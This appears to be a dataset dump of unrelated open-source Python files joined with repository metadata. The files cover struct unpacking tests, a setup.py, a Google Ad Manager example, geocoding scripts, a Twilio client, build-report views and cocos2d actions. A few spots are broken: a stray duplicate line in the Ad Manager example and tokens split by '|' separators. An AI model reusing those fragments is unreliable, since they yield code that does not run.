    s2 = S2().unpack(b'\x01\x02\x03\x04\x42')
    assert s2.a == 0x04030201
    assert s2.b == b'B'
    # Packing re-emits trailing padding as zero bytes.
    assert s2.pack() == b'\x01\x02\x03\x04\x42\0\0\0'
    # Packed struct: no padding in either direction.
    s3 = S3().unpack(b'\x43\x01\x00\x00\x00')
    assert s3.a == b'C'
    assert s3.b == 1
    assert s3.pack() == b'\x43\x01\x00\x00\x00'
def test_Struct_CntFields():
@StructDefine("""
s*16 : uuidDesigner
I : cbStructSize
s*~I : bstrAddinRegKey
s*~I : bstrAddinName
s*~I : bstrAddinDescription
I : dwLoadBehaviour
s*~I : bstrSatelliteDll
s*~I : bstrAdditionalRegKey
I : dwCommandLineSafe
""",packed=True)
class DesignerInfo(StructFormatter):
order = '<'
def __init__(self,data="",offset=0):
if data:
self.unpack(data,offset)
d = DesignerInfo()
assert d.format() == '16sI#s#s#sI#s#sI'
assert d.size() == float('Infinity')
d.unpack(b'A'*16+
b'\x01\0\0\0'+
b'\x04\0\0\0abcd'+
b'\x04\0\0\0abcd'+
b'\x04\0\0\0abcd'+
b'\x02\0\0\0'+
b'\x04\0\0\0abcd'+
b'\x04\0\0\0abcd'+
b'\x03\0\0\0')
assert d.uuidDesigner == b'A'*16
assert d.bstrAddinRegKey == b'abcd'
assert d.dwCommandLineSafe == 3
|
tylerbutler/engineer | setup.py | Python | mit | 5,374 | 0.002419 | # coding=utf-8
# Bootstrap installation of setuptools
from ez_setup import use_setuptools
use_setuptools()
import os
import sys
from fnmatch import fnmatchcase
from distutils.util import convert_path
from propane_distribution import cmdclassdict
from setuptools import setup, find_packages
from engineer import version
# Distribution/package name used throughout this setup script.
PROJECT = 'engineer'
################################################################################
# find_package_data written by Ian Bicking.
# Provided as an attribute, so you can append to these instead
# of replicating them:
# Default file/directory patterns ignored by find_package_data below.
standard_exclude = ('*.py', '*.pyc', '*~', '.*', '*.bak', '*.swp*')
standard_exclude_directories = ('.*', 'CVS', '_darcs', './build',
                                './dist', 'EGG-INFO', '*.egg-info')
def find_package_data(
        where='.', package='',
        exclude=standard_exclude,
        exclude_directories=standard_exclude_directories,
        only_in_packages=True,
        show_ignored=False):
    """
    Return a dictionary suitable for use in ``package_data``
    in a distutils ``setup.py`` file.

    The dictionary looks like::

        {'package': [files]}

    Where ``files`` is a list of all the files in that package that
    don't match anything in ``exclude``.

    If ``only_in_packages`` is true, then top-level directories that
    are not packages won't be included (but directories under packages
    will).

    Directories matching any pattern in ``exclude_directories`` will
    be ignored; by default directories with leading ``.``, ``CVS``,
    and ``_darcs`` will be ignored.

    If ``show_ignored`` is true, then all the files that aren't
    included in package data are shown on stderr (for debugging
    purposes).

    Note patterns use wildcards, or can be exact paths (including
    leading ``./``), and all searching is case-insensitive.

    This function is by Ian Bicking.
    """
    out = {}
    # Iterative breadth-first walk; each stack entry carries the directory,
    # the path prefix relative to its package, the package name, and the
    # only_in_packages flag for that subtree.
    stack = [(convert_path(where), '', package, only_in_packages)]
    while stack:
        where, prefix, package, only_in_packages = stack.pop(0)
        for name in os.listdir(where):
            fn = os.path.join(where, name)
            if os.path.isdir(fn):
                bad_name = False
                for pattern in exclude_directories:
                    if (fnmatchcase(name, pattern)
                            or fn.lower() == pattern.lower()):
                        bad_name = True
                        if show_ignored:
                            # Python 2 print-to-stream syntax.
                            print >> sys.stderr, (
                                "Directory %s ignored by pattern %s"
                                % (fn, pattern))
                        break
                if bad_name:
                    continue
                if os.path.isfile(os.path.join(fn, '__init__.py')):
                    # Subdirectory is itself a package: descend with a new
                    # dotted package name and a reset prefix.
                    if not package:
                        new_package = name
                    else:
                        new_package = package + '.' + name
                    stack.append((fn, '', new_package, False))
                else:
                    # Plain data directory: keep the package, extend prefix.
                    stack.append((fn, prefix + name + '/', package, only_in_packages))
            elif package or not only_in_packages:
                # is a file
                bad_name = False
                for pattern in exclude:
                    if (fnmatchcase(name, pattern)
                            or fn.lower() == pattern.lower()):
                        bad_name = True
                        if show_ignored:
                            print >> sys.stderr, (
                                "File %s ignored by pattern %s"
                                % (fn, pattern))
                        break
                if bad_name:
                    continue
                out.setdefault(package, []).append(prefix + name)
    return out
################################################################################
# noinspection PyShadowingBuiltins
def get_install_requirements(requirements_file='requirements.txt'):
    """
    Parse a pip-style requirements file into a list of requirement strings.

    Blank lines, comments (``#``) and pip directives (``-e``, ``-r``) are
    skipped.

    Fixes over the previous version:
    - lines are ``strip()``-ed instead of blindly dropping the last
      character, so a file without a trailing newline no longer loses the
      final character of its last requirement;
    - no shadowing of the ``file`` builtin;
    - removed the dead ``line is None`` check (lines read from a file are
      never None).

    :param requirements_file: path of the requirements file to read.
    :return: list of requirement specifier strings.
    """
    requirements = []
    with open(requirements_file) as req_file:
        for raw_line in req_file:
            line = raw_line.strip()
            if not line or line.startswith(('#', '-e', '-r')):
                continue
            requirements.append(line)
    return requirements
# noinspection PyShadowingBuiltins
def get_readme():
    """Return the contents of README.md (used as the long description)."""
    # Renamed the context variable: the old name shadowed the 'file' builtin.
    with open('README.md') as readme:
        return readme.read()
# Distribution metadata; requirements and long description are read from
# requirements*.txt and README.md via the helpers above.
setup(
    name=PROJECT,
    version=version.string,
    author='Tyler Butler',
    author_email='tyler@tylerbutler.com',
    platforms='any',
    packages=find_packages(),
    entry_points={
        'console_scripts': [
            'engineer=engineer.engine:cmdline',
            'engineer_dev=engineer.devtools:main [dev]'
        ],
    },
    url='http://github.com/tylerbutler/engineer',
    license='MIT',
    description='A static website generator.',
    long_description=get_readme(),
    install_requires=get_install_requirements(),
    tests_require=get_install_requirements('requirements_tests.txt'),
    extras_require={
        'dev': ['argh', 'clint']
    },
    cmdclass=cmdclassdict,
    include_package_data=True,
    package_data=find_package_data(PROJECT,
                                   package=PROJECT,
                                   only_in_packages=False),
    # Setting to False doesn't create an egg - easier to debug and hack on
    zip_safe=True,
)
|
googleads/googleads-python-lib | examples/ad_manager/v202202/creative_set_service/associate_creative_set_to_line_item.py | Python | apache-2.0 | 1,986 | 0.006042 | #!/usr/bin/env python
#
# Copyright 2015 Google Inc. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#      http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Creates a line item creative association for a creative set.
To create creative sets, run create_creative_set.py. To create creatives, run
create_creatives.py. To determine which LICAs exist, run get_all_licas.py.
The LoadFromStorage method is pulling credentials and properties from a
"googleads.yaml" file. By default, it looks for this file in your home
directory. For more information, see the "Caching authentication information"
section of our README.
"""
# Import appropriate modules from the client library.
from googleads import ad_manager
# Placeholder IDs: replace these with real values before running the example.
CREATIVE_SET_ID = 'INSERT_CREATIVE_SET_ID_HERE'
LINE_ITEM_ID = 'INSERT_LINE_ITEM_ID_HERE'
def main(client, creative_set_id, line_item_id):
    """Associate the given creative set with the given line item."""
    # Fetch the LICA service endpoint from the Ad Manager client.
    service = client.GetService(
        'LineItemCreativeAssociationService', version='v202202')

    # Build the association payload and submit it.
    association = {'creativeSetId': creative_set_id, 'lineItemId': line_item_id}
    created = service.createLineItemCreativeAssociations([association])

    # Report what was created.
    message = ('LICA with line item ID "%s" and creative set ID "%s" was '
               'created.') % (created['lineItemId'], created['creativeSetId'])
    print(message)
'created.') % (lica['lineItemId'], lica['creativeSetId']))
if __name__ == '__main__':
    # Initialize client object.
    # Credentials are read from the "googleads.yaml" file (see module docstring).
    ad_manager_client = ad_manager.AdManagerClient.LoadFromStorage()
    main(ad_manager_client, CREATIVE_SET_ID, LINE_ITEM_ID)
|
yannrouillard/weboob | modules/regionsjob/job.py | Python | agpl-3.0 | 1,035 | 0.001932 | # -*- coding: utf-8 -*-
# Copyright(C) 2013 Bezleputh
#
# This file is part of weboob.
#
# weboob is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# weboob is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with weboob. If not, see <http://www.gnu.org/licenses/>.
from weboob.capabilities.job import BaseJobAdvert
class RegionsJobAdvert(BaseJobAdvert):
    """Job advert whose ID packs the site domain and the offer number."""

    @classmethod
    def id2url(cls, _id):
        # The advert ID has the form "<domain>|<offer number>".
        parts = _id.split('|')
        domain, offer_number = parts[0], parts[1]
        url_template = 'http://%s/offre_emploi/detailoffre.aspx?numoffre=%s&de=consultation'
        return url_template % (domain, offer_number)
|
jakobzhao/ashcrawler | core/geo.py | Python | lgpl-3.0 | 5,940 | 0.002416 | # !/usr/bin/python
# -*- coding: utf-8 -*-
#
# Created on Oct 16, 2015
# @author: Bo Zhao
# @email: bo_zhao@hks.harvard.edu
# @website: http://yenching.org
# @organization: Harvard Kennedy School
import urllib2
import json
import sys
from settings import BAIDU_AK
from log import *
reload(sys)
sys.setdefaultencoding('utf-8')
def geocode(loc):
    """Geocode a location string via the Baidu Maps API.

    Returns [lat, lng], or [-1, -1] when the lookup is skipped or fails.
    Python 2 code (urllib2, `except E, e` syntax).
    """
    lat, lng = -1, -1
    url = 'http://api.map.baidu.com/geocoder/v2/?address=%s&output=json&ak=%s' % (loc, BAIDU_AK)
    # Locations Baidu cannot geocode usefully (foreign countries, "other");
    # these are skipped and keep the [-1, -1] sentinel.
    others = [u'其他', u'美国', u'英国', u'澳大利亚', u'伊朗', u'台湾', u'沙特阿拉伯',
              u'爱尔兰', u'印度', u'印尼', u'奥地利', u'挪威', u'乌克兰', u'瑞士',
              u'西班牙', u'古巴', u'挪威', u'德国', u'埃及', u'巴西', u'比利时']
    if loc in others:
        pass
    else:
        try:
            # Baidu rejects raw spaces in the query string.
            response = urllib2.urlopen(url.replace(' ', '%20'))
        except urllib2.HTTPError, e:
            log(WARNING, e, 'geocode')
        # NOTE(review): if urlopen raised, `response` is unbound and the
        # read below raises NameError instead of being logged — confirm
        # whether the HTTPError branch should return early.
        try:
            loc_json = json.loads(response.read())
            lat = loc_json[u'result'][u'location'][u'lat']
            lng = loc_json[u'result'][u'location'][u'lng']
        except ValueError:
            log(ERROR, "No JSON object was decoded", 'geocode')
        except KeyError, e:
            log(ERROR, e.message, 'geocode')
    return [lat, lng]
# Estimate where a post was sent out based on the semantics of the user's name,
# verified inforamtion, and/or other contextual information.
def geocode_by_semantics(project, address, port):
from pymongo import MongoClient
client = MongoClient(address, port)
db = client[project]
search_json = {'$or': [{'latlng': [0, 0]}, {'latlng': [-1, -1]}], 'verified': True}
users = db.users.find(search_json)
count = db.users.find(search_json).count()
print count
i = 0
for user in users:
i += 1
verified_info = user['verified_info']
username = user['username']
verified_info = verified_info.replace(u'主持人', '').replace(u'职员', '').replace(u'院长', '').replace(u'经理', '')
verified_info = verified_info.split(u' ')[0]
| if verified_info == u'前' or u'www' in verified_info or u'律师' in verified_info or u'学者' in verified_info or u'作家' in verified_info or u'媒体人' in verified_info or u'诗人' in verified_info:
verified_info = ''
locational_inf | o = verified_info
if locational_info == '':
locational_info = username
if verified_info != '':
latlng = geocode(verified_info)
else:
continue
log(NOTICE, '#%d geocode the user by its semantic info %s. %d posts remain. latlng: %s ' % (i, verified_info.encode('gbk', 'ignore'), count - i, str(latlng)))
if latlng[0] != -1 and latlng[0] != 0:
db.users.update({'userid': user['userid']}, {'$set': {'latlng': latlng}})
log(NOTICE, "mission compeletes.")
def geocode_locational_info(project, address, port):
    """Geocode users with an explicit 'location' field but no coordinates.

    Finds users whose latlng is a [0, 0] / [-1, -1] sentinel and whose
    'location' is non-empty, geocodes that string, and writes real fixes
    back into MongoDB. Python 2 code (print statement).
    """
    from pymongo import MongoClient
    client = MongoClient(address, port)
    db = client[project]
    search_json = {'$or': [{'latlng': [0, 0]}, {'latlng': [-1, -1]}], 'location': {'$ne': ''}}
    users = db.users.find(search_json)
    count = users.count()
    print count
    i = 0
    for user in users:
        i += 1
        if 'location' in user.keys():
            latlng = geocode(user['location'])
            log(NOTICE, '#%d geocode the user by its locational info %s. %d posts remain. latlng: %s ' % (i, user['location'].encode('gbk', 'ignore'), count - i, str(latlng)))
            # Only persist real fixes (skip the 0 / -1 sentinels).
            if latlng[0] != -1 and latlng[0] != 0:
                db.users.update({'userid': user['userid']}, {'$set': {'latlng': latlng}})
        else:
            continue
    log(NOTICE, "mission compeletes.")
# Estimate where a post was sent out based the path of its author.
def estimate_location_by_path(user):
    """
    Estimate a user's location from its recorded path.

    The estimate is the candidate point closest (by Manhattan distance) to
    the centroid of all candidates. The user's current ``latlng`` joins the
    candidates when it is a real fix, i.e. neither the [0, 0] nor the
    [-1, -1] placeholder.

    FIX: the previous version appended ``latlng`` directly to
    ``user['path']``, mutating the caller's data on every call; this
    version works on a copy.

    :param user: mapping with 'path' (list of [lat, lng, ...] points) and
        'latlng' ([lat, lng]).
    :return: [lat, lng] estimate, or [-1, -1] when no estimate is possible.
    """
    est_latlng = [-1, -1]
    latlng = user['latlng']
    # Copy so the caller's user['path'] is never modified.
    path = list(user['path'])
    if path and path[0][0] != 0:
        if latlng != [0, 0] and latlng != [-1, -1]:
            path.append(latlng)
        # Centroid of all candidate points.
        avg_lat = sum(p[0] for p in path) / float(len(path))
        avg_lng = sum(p[1] for p in path) / float(len(path))
        # Pick the candidate closest to the centroid (Manhattan distance),
        # trimming any extra per-point data beyond lat/lng.
        distances = [abs(p[0] - avg_lat) + abs(p[1] - avg_lng) for p in path]
        est_latlng = path[distances.index(min(distances))][0:2]
    elif not path and latlng != [0, 0]:
        # No path recorded: fall back to the stored location when it is set.
        est_latlng = latlng
    return est_latlng
# Estimate where a post was sent out by the locational information of its author.
def georeference(project, address, port):
    """Copy each author's coordinates onto their posts.

    For every post whose latlng is a [0, 0] / [-1, -1] sentinel, look up
    the author's latlng and, when it is a real fix, write it onto all
    posts sharing the post's 'mid'. Python 2 code (print statement).
    """
    from pymongo import MongoClient
    client = MongoClient(address, port)
    db = client[project]
    search_json = {'$or': [{'latlng': [0, 0]}, {'latlng': [-1, -1]}]}
    posts = db.posts.find(search_json)
    count = db.posts.find(search_json).count()
    i = 0
    for post in posts:
        # userid = post['user']['userid']
        username = post['user']['username']
        user = db.users.find_one({'username': username})
        i += 1
        try:
            # Skip authors whose latlng is still a sentinel (~0 or ~-1).
            if abs(user['latlng'][0] - 0) < 0.001:
                pass
            elif abs(user['latlng'][0] + 1) < 0.001:
                pass
            else:
                try:
                    db.posts.update_many({'mid': post['mid']}, {'$set': {
                        'latlng': user['latlng']
                    }
                    })
                    log(NOTICE, 'georeferencing #%d, %d posts remain. latlng: %s ' % (i, count - i, str(user['latlng'])))
                except:
                    log(NOTICE, 'the user latlng does not exit')
        except:
            # user lookup returned None (author no longer in the collection).
            print "user has been mistakenly deleted"
    log(NOTICE, "mission compeletes.")
|
Vagab0nd/SiCKRAGE | lib3/twilio/rest/sync/v1/service/sync_stream/stream_message.py | Python | gpl-3.0 | 5,237 | 0.003246 | # coding=utf-8
r"""
This code was generated by
\ / _ _ _| _ _
| (_)\/(_)(_|\/| |(/_ v1.0.0
/ /
"""
from twilio.base import serialize
from twilio.base import values
from twilio.base.instance_resource import InstanceResource
from twilio.base.list_resource import ListResource
from twilio.base.page import Page
# Auto-generated Twilio helper code (see the file header).
class StreamMessageList(ListResource):
    """ PLEASE NOTE that this class contains beta products that are subject to
    change. Use them with caution. """

    def __init__(self, version, service_sid, stream_sid):
        """
        Initialize the StreamMessageList

        :param Version version: Version that contains the resource
        :param service_sid: The SID of the Sync Service that the resource is associated with
        :param stream_sid: The unique string that identifies the resource

        :returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageList
        :rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageList
        """
        super(StreamMessageList, self).__init__(version)

        # Path Solution: parameters interpolated into the resource URI below.
        self._solution = {'service_sid': service_sid, 'stream_sid': stream_sid, }
        self._uri = '/Services/{service_sid}/Streams/{stream_sid}/Messages'.format(**self._solution)

    def create(self, data):
        """
        Create the StreamMessageInstance

        :param dict data: A JSON string that represents an arbitrary, schema-less object that makes up the Stream Message body

        :returns: The created StreamMessageInstance
        :rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
        """
        # Serialize the payload and POST it to the messages endpoint.
        data = values.of({'Data': serialize.object(data), })

        payload = self._version.create(method='POST', uri=self._uri, data=data, )

        return StreamMessageInstance(
            self._version,
            payload,
            service_sid=self._solution['service_sid'],
            stream_sid=self._solution['stream_sid'],
        )

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Sync.V1.StreamMessageList>'
class StreamMessagePage(Page):
    """ PLEASE NOTE that this class contains beta products that are subject to
    change. Use them with caution.

    NOTE: the original text of this class was corrupted by stray separator
    characters in get_instance; this version restores the intended code.
    """

    def __init__(self, version, response, solution):
        """
        Initialize the StreamMessagePage

        :param Version version: Version that contains the resource
        :param Response response: Response from the API
        :param solution: path solution dict carrying 'service_sid' and
            'stream_sid' for instances built from this page

        :returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessagePage
        :rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessagePage
        """
        super(StreamMessagePage, self).__init__(version, response)

        # Path Solution
        self._solution = solution

    def get_instance(self, payload):
        """
        Build an instance of StreamMessageInstance

        :param dict payload: Payload response from the API

        :returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
        :rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
        """
        return StreamMessageInstance(
            self._version,
            payload,
            service_sid=self._solution['service_sid'],
            stream_sid=self._solution['stream_sid'],
        )

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Sync.V1.StreamMessagePage>'
# Auto-generated Twilio helper code (see the file header).
class StreamMessageInstance(InstanceResource):
    """ PLEASE NOTE that this class contains beta products that are subject to
    change. Use them with caution. """

    def __init__(self, version, payload, service_sid, stream_sid):
        """
        Initialize the StreamMessageInstance

        :returns: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
        :rtype: twilio.rest.sync.v1.service.sync_stream.stream_message.StreamMessageInstance
        """
        super(StreamMessageInstance, self).__init__(version)

        # Marshaled Properties: raw API payload fields exposed via the
        # properties below.
        self._properties = {'sid': payload.get('sid'), 'data': payload.get('data'), }

        # Context
        self._context = None
        self._solution = {'service_sid': service_sid, 'stream_sid': stream_sid, }

    @property
    def sid(self):
        """
        :returns: The unique string that identifies the resource
        :rtype: unicode
        """
        return self._properties['sid']

    @property
    def data(self):
        """
        :returns: Stream Message body
        :rtype: dict
        """
        return self._properties['data']

    def __repr__(self):
        """
        Provide a friendly representation

        :returns: Machine friendly representation
        :rtype: str
        """
        return '<Twilio.Sync.V1.StreamMessageInstance>'
|
andrewSC/checkthat | checkthat/views.py | Python | mit | 5,807 | 0.000689 | from .models import BuildFailure
# TODO: Make this class and its methods better in general.
class View:
    """Base view: renders the banner/footer pairs used by concrete views.

    Every section header looks like ``---…--- <title> ---…---`` and every
    footer is a run of dashes as wide as its header. The eight
    near-duplicate methods are kept for interface compatibility but now
    share one private helper (addresses the TODO above this class).
    """

    def __init__(self):
        # Number of dashes padding each side of a section title.
        self.char_padding_len = 30

    def _banner(self, title):
        """Return *title* framed by dash padding on both sides."""
        return "{0} {1} {0}".format('-' * self.char_padding_len, title)

    def get_build_header(self):
        return self._banner("Build Results")

    def get_build_footer(self):
        return "-" * len(self.get_build_header())

    def get_failure_header(self):
        return self._banner("Failures")

    def get_failure_footer(self):
        return "-" * len(self.get_failure_header())

    def get_namcap_pkg_header(self):
        return self._banner("Namcap Pkg Analysis")

    def get_namcap_pkg_footer(self):
        return "-" * len(self.get_namcap_pkg_header())

    def get_namcap_pkgbuild_header(self):
        return self._banner("Namcap PKGBUILD Analysis")

    def get_namcap_pkgbuild_footer(self):
        return "-" * len(self.get_namcap_pkgbuild_header())
# TODO: Refactor EmailView and CliView to remove duplicate code!!
# TODO: Make this better ASAP
class CliView(View):
    """Render build results to stdout.

    NOTE: the original text of generate_output was corrupted by stray
    separator characters in the failure section; this version restores
    the intended code.
    """

    def __init__(self):
        super(CliView, self).__init__()

    def generate_output(self, builds):
        """Print a full report for *builds*: summary, failures, namcap output.

        :param builds: iterable of build result objects (BuildFailure marks
            a failed build).
        """
        total_build_time = 0
        has_failures = False
        has_pkg_analysis = False  # TODO: Make this better
        has_pkgbuild_analysis = False  # TODO: Make this better

        # First pass: print per-build status and collect section flags.
        print(self.get_build_header())
        for build in builds:
            print(build.status_msg)
            total_build_time += build.total_build_time
            if type(build) is BuildFailure:
                has_failures = True
            if build.namcap_pkgbuild_analysis:
                has_pkgbuild_analysis = True
            if build.namcap_pkg_analysis:
                has_pkg_analysis = True
        mins, secs = divmod(total_build_time, 60)
        print(f"Total build time: {mins}m {secs}s")
        print(self.get_build_footer())

        if has_failures:
            print(self.get_failure_header())
            for build in builds:
                if type(build) is BuildFailure:
                    header = f"xxxxxxxxxxxxxxx {build.status_msg} xxxxxxxxxxxxxxx"
                    footer = "x" * len(header)
                    print(header)
                    for error in build.error_msgs:
                        print(error)
                    print(footer)
            print(self.get_failure_footer())

        if has_pkgbuild_analysis:
            print(self.get_namcap_pkgbuild_header())
            for build in builds:
                msgs = build.namcap_pkgbuild_analysis.msgs
                # NOTE: We need to check the list to make sure it has actual
                # content and not just the empty string
                if any([item for item in msgs if item != '']):
                    for msg in msgs:
                        print(msg)
            print(self.get_namcap_pkgbuild_footer())

        if has_pkg_analysis:
            print(self.get_namcap_pkg_header())
            for build in builds:
                # Package analysis only exists for successful builds.
                if type(build) is not BuildFailure:
                    for msg in build.namcap_pkg_analysis.msgs:
                        print(msg)
            print(self.get_namcap_pkg_footer())
# TODO: Refactor EmailView and CliView to remove duplicate code!!
# TODO: Make this better ASAP
# TODO: Refactor EmailView and CliView to remove duplicate code!!
class EmailView(View):
    def __init__(self):
        super(EmailView, self).__init__()

    def generate_output(self, builds):
        # Same report structure as CliView.generate_output, but collected
        # into a single string (for an email body) instead of printed.
        total_build_time = 0
        has_failures = False
        has_pkg_analysis = False  # TODO: Make this better
        has_pkgbuild_analysis = False  # TODO: Make this better
        output = []

        # First pass: per-build status lines plus section flags.
        output.append(self.get_build_header() + '\n')
        for build in builds:
            output.append(build.status_msg + '\n')
            total_build_time += build.total_build_time
            if type(build) is BuildFailure:
                has_failures = True
            if build.namcap_pkgbuild_analysis:
                has_pkgbuild_analysis = True
            if build.namcap_pkg_analysis:
                has_pkg_analysis = True
        mins, secs = divmod(total_build_time, 60)
        output.append(f"\nTotal build time: {mins}m {secs}s\n")
        output.append(self.get_build_footer() + '\n\n')

        if has_failures:
            output.append(self.get_failure_header() + '\n')
            for build in builds:
                if type(build) is BuildFailure:
                    header = f"xxxxxxxxxxxxxxx {build.status_msg} xxxxxxxxxxxxxxx"
                    footer = "x" * len(header)
                    output.append('\n' + header + '\n')
                    for error in build.error_msgs:
                        output.append(error + '\n')
                    output.append(footer + '\n')
            output.append(self.get_failure_footer() + '\n\n')

        if has_pkgbuild_analysis:
            output.append(self.get_namcap_pkgbuild_header() + '\n')
            for build in builds:
                msgs = build.namcap_pkgbuild_analysis.msgs
                # NOTE: We need to check the list to make sure it has actual
                # content and not just the empty string
                if any([item for item in msgs if item != '']):
                    for msg in msgs:
                        output.append(msg + '\n')
            output.append(self.get_namcap_pkgbuild_footer() + '\n\n')

        if has_pkg_analysis:
            output.append(self.get_namcap_pkg_header() + '\n')
            for build in builds:
                # Package analysis only exists for successful builds.
                if type(build) is not BuildFailure:
                    for msg in build.namcap_pkg_analysis.msgs:
                        output.append(msg + '\n')
            output.append(self.get_namcap_pkg_footer() + '\n')

        return ''.join(output)
|
shadowmint/nwidget | lib/cocos2d-0.5.5/cocos/actions/interval_actions.py | Python | apache-2.0 | 22,046 | 0.009027 | # ----------------------------------------------------------------------------
# cocos2d
# Copyright (c) 2008-2012 Daniel Moisset, Ricardo Quesada, Rayentray Tappa,
# Lucio Torre
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in
# the documentation and/or other materials provided with the
# distribution.
# * Neither the name of cocos2d nor the names of its
# contributors may be used to endorse or promote products
# derived from this software without specific prior written
# permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE
# COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT,
# INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING,
# BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
# LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER
# CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
# LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN
# ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
# ----------------------------------------------------------------------------
'''Interval Action
Interval Actions
================
An interval action is an action that takes place within a certain period of time.
It has an start time, and a finish time. The finish time is the parameter
``duration`` plus the start time.
These `IntervalAction` have some interesting properties, like:
- They can run normally (default)
- They can run reversed with the `Reverse` action.
- They can run with the time altered with the `Accelerate`, `AccelDeccel` and
`Speed` actions.
For example, you can simulate a Ping Pong effect running the action normally and
then running it again in Reverse mode.
Example::
ping_pong_action = action + Reverse( action )
Available IntervalActions
=========================
* `MoveTo`
* `MoveBy`
* `JumpTo`
* `JumpBy`
* `Bezier`
* `Blink`
* `RotateTo`
* `RotateBy`
* `ScaleTo`
* `ScaleBy`
* `FadeOut`
* `FadeIn`
* `FadeTo`
* `Delay`
* `RandomDelay`
Modifier actions
================
* `Accelerate`
* `AccelDeccel`
* `Speed`
Examples::
move = MoveBy( (200,0), duration=5 ) # Moves 200 pixels to the right in 5 seconds.
move = MoveTo( (320,240), duration=5) # Moves to the pixel (320,240) in 5 seconds
jump = JumpBy( (320,0), 100, 5, duration=5) # Jumps to the right 320 pixels
# doing 5 jumps of 100 pixels
# of height in 5 seconds
accel_move = Accelerate(move) # accelerates action move
'''
__docformat__ = 'restructuredtext'
import random
import cop | y
import math
from base_actions im | port *
from cocos.euclid import *
# Public names exported by ``from ... import *``.
__all__ = [ 'Lerp',                                 # interpolation
            'MoveTo','MoveBy',                      # movement actions
            'Jump', 'JumpTo', 'JumpBy',
            'Bezier',                               # complex movement actions
            'Rotate',"RotateTo", "RotateBy",        # object rotation
            'ScaleTo','ScaleBy',                    # object scale
            'Delay','RandomDelay',                  # Delays
            'FadeOut','FadeIn','FadeTo',            # Fades in/out action
            'Blink',                                # Blink action
            'Accelerate','AccelDeccel','Speed',     # Time alter actions
            ]
class Lerp( IntervalAction ):
    """Linearly interpolate a named attribute of the target between two
    values over the duration of the action.
    """
    def init(self, attrib, start, end, duration):
        """Init method.

        :Parameters:
            `attrib` : string
                The name of the attribute where the value is stored
            `start` : float
                The start value
            `end` : float
                The end value
            `duration` : float
                Duration time in seconds
        """
        self.attrib = attrib
        self.duration = duration
        self.start_p = start
        self.end_p = end
        self.delta = end - start

    def update(self, t):
        # t runs from 0 to 1 over the action's duration.
        interpolated = self.start_p + self.delta * t
        setattr(self.target, self.attrib, interpolated)

    def __reversed__(self):
        # Running backwards is simply interpolating end -> start.
        return Lerp(self.attrib, self.end_p, self.start_p, self.duration)
class RotateBy( IntervalAction ):
    """Rotates a `CocosNode` object clockwise a number of degrees by
    modifying its rotation attribute.

    Example::

        # rotates the sprite 180 degrees in 2 seconds
        action = RotateBy( 180, 2 )
        sprite.do( action )
    """
    def init(self, angle, duration):
        """Init method.

        :Parameters:
            `angle` : float
                Degrees that the sprite will be rotated.
                Positive degrees rotates the sprite clockwise.
            `duration` : float
                Duration time in seconds
        """
        self.angle = angle          #: Quantity of degrees to rotate
        self.duration = duration    #: Duration in seconds

    def start(self):
        # Remember the starting rotation; update() offsets from it.
        self.start_angle = self.target.rotation

    def update(self, t):
        rotated = self.start_angle + self.angle * t
        self.target.rotation = rotated % 360

    def __reversed__(self):
        return RotateBy(-self.angle, self.duration)

# Backwards-compatible alias for the old class name.
Rotate = RotateBy
class RotateTo( IntervalAction ):
    """Rotates a `CocosNode` object to a certain angle by modifying it's
    rotation attribute.
    The direction will be decided by the shortest angle.

    Example::
        # rotates the sprite to angle 180 in 2 seconds
        action = RotateTo( 180, 2 )
        sprite.do( action )
    """
    def init(self, angle, duration ):
        """Init method.

        :Parameters:
            `angle` : float
                Destination angle in degrees.
            `duration` : float
                Duration time in seconds
        """
        self.angle = angle%360 #: Destination angle in degrees
        self.duration = duration #: Duration in seconds

    def start( self ):
        ea = self.angle
        sa = self.start_angle = (self.target.rotation%360)
